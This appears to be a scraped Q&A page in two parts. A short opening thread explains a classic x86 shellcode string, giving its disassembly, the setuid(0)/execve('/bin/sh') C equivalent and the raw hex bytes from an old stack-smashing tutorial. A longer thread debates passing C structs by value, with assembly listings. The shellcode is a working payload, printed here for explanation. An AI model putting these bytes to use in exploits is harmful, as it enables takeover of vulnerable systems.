0x804a06f <shellcode+47>: bound %ebp,0x6e(%ecx)
0x804a072 <shellcode+50>: das
0x804a073 <shellcode+51>: jae 0x804a0dd
0x804a075 <shellcode+53>: add %al,(%eax)
This corresponds to roughly
setuid(0);
x[0] = "/bin/sh"
x[1] = 0;
execve("/bin/sh", &x[0], &x[1])
exit(0);
That string is from an old document on buffer overflows, and will execute /bin/sh. Since it's malicious code (well, when paired with a buffer exploit) - you should really include it's origin next time.
From that same document, how to code stack based exploits :
/* the shellcode is hex for: */
#include <stdio.h>
main() {
char *name[2];
name[0] = "sh";
name[1] = NULL;
execve("/bin/sh",name,NULL);
}
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0
\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c
\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
The code you included causes the contents of shellcode[] to be executed, running execve, and providing access to the shell. And the term Shellcode? From Wikipedia :
In computer security, a shellcode is a
small piece of code used as the
payload in the exploitation of a
software vulnerability. It is called
"shellcode" because it typically
starts a command shell from which the
attacker can control the compromised
machine. Shellcode is commonly written
in machine code, but any piece of code
that performs a similar task can be
called shellcode.
Without looking up all the actual opcodes to confirm, the shellcode array contains the machine code necessary to exec /bin/sh. This shellcode is machine code carefully constructed to perform the desired operation on a specific target platform and not to contain any null bytes.
The code in main() is changing the return address and the flow of execution in order to cause the program to spawn a shell by having the instructions in the shellcode array executed.
See Smashing The Stack For Fun And Profit for a description on how shellcode such as this can be created and how it might be used.
The string contains a series of bytes represented in hexadecimal.
The bytes encode a series of instructions for a particular processor on a particular platform — hopefully, yours. (Edit: if it's malware, hopefully not yours!)
The variable is defined just to get a handle to the stack. A bookmark, if you will. Then pointer arithmetic is used, again platform-dependent, to manipulate the state of the program to cause the processor to jump to and execute the bytes in the string.
Each \xXX is a hexadecimal number. One, two or three of such numbers together form an op-code (google for it). Together it forms assembly which can be executed by the machine more or less directly. And this code tries to execute the shellcode.
I think the shellcode tries to spawn a shell.
This is just spawn /bin/sh, for example in C like execve("/bin/sh", NULL, NULL);

Are there any downsides to passing structs by value in C, rather than passing a pointer?

Are there any downsides to passing structs by value in C, rather than passing a pointer?
If the struct is large, there is obviously the performance aspect of copying lots of data, but for a smaller struct, it should basically be the same as passing several values to a function.
It is maybe even more interesting when used as return values. C only has single return values from functions, but you often need several. So a simple solution is to put them in a struct and return that.
Are there any reasons for or against this?
Since it might not be obvious to everyone what I'm talking about here, I'll give a simple example.
If you're programming in C, you'll sooner or later start writing functions that look like this:
void examine_data(const char *ptr, size_t len)
{
...
}
char *p = ...;
size_t l = ...;
examine_data(p, l);
This isn't a problem. The only issue is that you have to agree with your coworker in which the order the parameters should be so you use the same convention in all functions.
But what happens when you want to return the same kind of information? You typically get something like this:
char *get_data(size_t *len);
{
...
*len = ...datalen...;
return ...data...;
}
size_t len;
char *p = get_data(&len);
This works fine, but is much more problematic. A return value is a return value, except that in this implementation it isn't. There is no way to tell from the above that the function get_data isn't allowed to look at what len points to. And there is nothing that makes the compiler check that a value is actually returned through that pointer. So next month, when someone else modifies the code without understanding it properly (because he didn't read the documentation?) it gets broken without anyone noticing, or it starts crashing randomly.
So, the solution I propose is the simple struct
struct blob { char *ptr; size_t len; }
The examples can be rewritten like this:
void examine_data(const struct blob data)
{
... use data.tr and data.len ...
}
struct blob = { .ptr = ..., .len = ... };
examine_data(blob);
struct blob get_data(void);
{
...
return (struct blob){ .ptr = ...data..., .len = ...len... };
}
struct blob data = get_data();
For some reason, I think that most people would instinctively make examine_data take a pointer to a struct blob, but I don't see why. It still gets a pointer and an integer, it's just much clearer that they go together. And in the get_data case it is impossible to mess up in the way I described before, since there is no input value for the length, and there must be a returned length.
For small structs (eg point, rect) passing by value is perfectly acceptable. But, apart from speed, there is one other reason why you should be careful passing/returning large structs by value: Stack space.
A lot of C programming is for embedded systems, where memory is at a premium, and stack sizes may be measured in KB or even Bytes... If you're passing or returning structs by value, copies of those structs will get placed on the stack, potentially causing the situation that this site is named after...
If I see an application that seems to have excessive stack usage, structs passed by value is one of the things I look for first.
One reason not to do this which has not been mentioned is that this can cause an issue where binary compatibility matters.
Depending on the compiler used, structures can be passed via the stack or registers depending on compiler options/implementation
See: http://gcc.gnu.org/onlinedocs/gcc/Code-Gen-Options.html
-fpcc-struct-return
-freg-struct-return
If two compilers disagree, things can blow up. Needless to say the main reasons not to do this are illustrated are stack consumption and performance reasons.
To really answer this question, one needs to dig deep into the assembly land:
(The following example uses gcc on x86_64. Anyone is welcome to add other architectures like MSVC, ARM, etc.)
Let's have our example program:
// foo.c
typedef struct
{
double x, y;
} point;
void give_two_doubles(double * x, double * y)
{
*x = 1.0;
*y = 2.0;
}
point give_point()
{
point a = {1.0, 2.0};
return a;
}
int main()
{
return 0;
}
Compile it with full optimizations
gcc -Wall -O3 foo.c -o foo
Look at the assembly:
objdump -d foo | vim -
This is what we get:
0000000000400480 <give_two_doubles>:
400480: 48 ba 00 00 00 00 00 mov $0x3ff0000000000000,%rdx
400487: 00 f0 3f
40048a: 48 b8 00 00 00 00 00 mov $0x4000000000000000,%rax
400491: 00 00 40
400494: 48 89 17 mov %rdx,(%rdi)
400497: 48 89 06 mov %rax,(%rsi)
40049a: c3 retq
40049b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
00000000004004a0 <give_point>:
4004a0: 66 0f 28 05 28 01 00 movapd 0x128(%rip),%xmm0
4004a7: 00
4004a8: 66 0f 29 44 24 e8 movapd %xmm0,-0x18(%rsp)
4004ae: f2 0f 10 05 12 01 00 movsd 0x112(%rip),%xmm0
4004b5: 00
4004b6: f2 0f 10 4c 24 f0 movsd -0x10(%rsp),%xmm1
4004bc: c3 retq
4004bd: 0f 1f 00 nopl (%rax)
Excluding the nopl pads, give_two_doubles() has 27 bytes while give_point() has 29 bytes. On the other hand, give_point() yields one fewer instruction than give_two_doubles()
What's interesting is that we notice the compiler has been able to optimize mov into the faster SSE2 variants movapd and movsd. Furthermore, give_two_doubles() actually moves data in and out from memory, which makes things slow.
Apparently much of this may not be applicable in embedded environments (which is where the playing field for C is most of the time nowdays). I'm not an assembly wizard so any comments would be welcome!
One thing people here have forgotten to mention so far (or I overlooked it) is that structs usually have a padding!
struct {
short a;
char b;
short c;
char d;
}
Every char is 1 byte, every short is 2 bytes. How large is the struct? Nope, it's not 6 bytes. At least not on any more commonly used systems. On most systems it will be 8. The problem is, the alignment is not constant, it's system dependent, so the same struct will have different alignment and different sizes on different systems.
Not only that padding will further eat up your stack, it also adds the uncertainty of not being able to predict the padding in advance, unless you know how your system pads and then look at every single struct you have in your app and calculate the size for it. Passing a pointer takes a predictable amount of space -- there is no uncertainty. The size of a pointer is known for the system, it is always equal, regardless of what the struct looks like and pointer sizes are always chosen in a way that they are aligned and need no padding.
Simple solution will be return an error code as a return value and everything else as a parameter in the function,
This parameter can be a struct of course but don't see any particular advantage passing this by value, just sent a pointer.
Passing structure by value is dangerous, you need to be very careful what are you passing are, remember there is no copy constructor in C, if one of structure parameters is a pointer the pointer value will be copied it might be very confusing and hard to maintain.
Just to complete the answer (full credit to Roddy ) the stack usage is another reason not pass structure by value, believe me debugging stack overflow is real PITA.
Replay to comment:
Passing struct by pointer meaning that some entity has an ownership on this object and have a full knowledge of what and when should be released. Passing struct by value create a hidden references to the internal data of struct (pointers to another structures etc .. ) at this is hard to maintain (possible but why ?) .
Here's something no one mentioned:
void examine_data(const char *c, size_t l)
{
c[0] = 'l'; // compiler error
}
void examine_data(const struct blob blob)
{
blob.ptr[0] = 'l'; // perfectly legal, quite likely to blow up at runtime
}
Members of a const struct are const, but if that member is a pointer (like char *), it becomes char *const rather than the const char * we really want. Of course, we could assume that the const is documentation of intent, and that anyone who violates this is writing bad code (which they are), but that's not good enough for some (especially those who just spent four hours tracking down the cause of a crash).
The alternative might be to make a struct const_blob { const char *c; size_t l } and use that, but that's rather messy - it gets into the same naming-scheme problem I have with typedefing pointers. Thus, most people stick to just having two parameters (or, more likely for this case, using a string library).
I think that your question has summed things up pretty well.
One other advantage of passing structs by value is that memory ownership is explicit. There is no wondering about if the struct is from the heap, and who has the responsibility for freeing it.
I'd say passing (not-too-large) structs by value, both as parameters and as return values, is a perfectly legitimate technique. One has to take care, of course, that the struct is either a POD type, or the copy semantics are well-specified.
Update: Sorry, I had my C++ thinking cap on. I recall a time when it was not legal in C to return a struct from a function, but this has probably changed since then. I would still say it's valid as long as all the compilers you expect to use support the practice.
Page 150 of PC Assembly Tutorial on http://www.drpaulcarter.com/pcasm/ has a clear explanation about how C allows a function to return a struct:
C also allows a structure type to be
used as the return value of a func-
tion. Obviously a structure can not be
returned in the EAX register.
Different compilers handle this
situation differently. A common
solution that compilers use is to
internally rewrite the function as one
that takes a structure pointer as a
parameter. The pointer is used to put
the return value into a structure
defined outside of the routine called.
I use the following C code to verify the above statement:
struct person {
int no;
int age;
};
struct person create() {
struct person jingguo = { .no = 1, .age = 2};
return jingguo;
}
int main(int argc, const char *argv[]) {
struct person result;
result = create();
return 0;
}
Use "gcc -S" to generate assembly for this piece of C code:
.file "foo.c"
.text
.globl create
.type create, #function
create:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
movl 8(%ebp), %ecx
movl $1, -8(%ebp)
movl $2, -4(%ebp)
movl -8(%ebp), %eax
movl -4(%ebp), %edx
movl %eax, (%ecx)
movl %edx, 4(%ecx)
movl %ecx, %eax
leave
ret $4
.size create, .-create
.globl main
.type main, #function
main:
pushl %ebp
movl %esp, %ebp
subl $20, %esp
leal -8(%ebp), %eax
movl %eax, (%esp)
call create
subl $4, %esp
movl $0, %eax
leave
ret
.size main, .-main
.ident "GCC: (Ubuntu 4.4.3-4ubuntu5) 4.4.3"
.section .note.GNU-stack,"",#progbits
The stack before call create:
+---------------------------+
ebp | saved ebp |
+---------------------------+
ebp-4 | age part of struct person |
+---------------------------+
ebp-8 | no part of struct person |
+---------------------------+
ebp-12 | |
+---------------------------+
ebp-16 | |
+---------------------------+
ebp-20 | ebp-8 (address) |
+---------------------------+
The stack right after calling create:
+---------------------------+
| ebp-8 (address) |
+---------------------------+
| return address |
+---------------------------+
ebp,esp | saved ebp |
+---------------------------+
I just want to point one advantage of passing your structs by value is that an optimizing compiler may better optimize your code.
Taking into account all of the things people have said...
Returning a struct was not always allowed in C. Now it is.
Returning a struct can be done in three ways...
a. Returning each member in a register (probably optimal, but unlikely to be the actual...)
b. Returning the struct in the stack (slower than registers, but still better than a cold access of heap ram... yay caching!)
c. Returning the struct in a pointer to the heap (It only hurts you when you read or write to it? A Good compiler will pass the pointers it read just once and tried to access, did instruction reordering and accesses it much earlier than needed so it was ready when you were? to make life better? (shiver))
Different compiler settings can cause different problems when the code interfaces because of this. (Different size registers, different amounts of padding, different optimizations turned on)
const-ness or volatile-ness doesn't permeate through a struct, and can result in some miserably un-efficient or possibly lead to broken code (E.G. a const struct foo does not result in foo->bar being const.)
Some simple measures I will take after reading this...
Make your functions accept parameters rather than structs. It allows fine grained control over const-ness and volatile-ness etc, it also ensures that all the variables passed are relevant to the function using them. If the parameters are all the same kind, use some other method to enforce ordering. (Make type defs to make your function calls more strongly typed, which an OS does routinely.)
Instead of allowing the final base function to return a pointer to a structure made in the heap, provide a pointer to a struct to put the results into. that struct still might be in the heap, but it is possible that the struct is actually in the stack - and will get better runtime performance. It also means that you do not need to rely on compilers providing you a struct return type.
By passing the parameters as pieces and being clear about the const-ness, volatile-ness, or the restrict-ness, you better convey your intentions to the complier and that will allow it to make better optimizations.
I am not sure where 'too big' and 'too small' is at, but I guess the answer is between 2 and register count + 1 members.
If I made a struct that holds 1 member that is an int, then clearly we should not pass the struct. (Not only is it inefficient, it also makes intention VERY murky... I suppose it has a use somewhere, but not common)
If I make a struct that holds two items, it might have value in clarity, as well as compliers might optimize it into two variables that travel as pairs. (risc-v specifies that a struct with two members returns both members in registers, assuming they are ints or smaller...)
If I make a structure that holds as many ints and double as there are in the registers for in the processor, it is TECHNICALLY a possible optimization.
The instance I surpass the register amounts though, it probably would have been worth it to keep the result struct in a pointer, and pass in only the parameters that were relevant. (That, and probably make the struct smaller and the function do less, because we have a LOT of registers on systems nowadays, even in the embedded world...)

Resources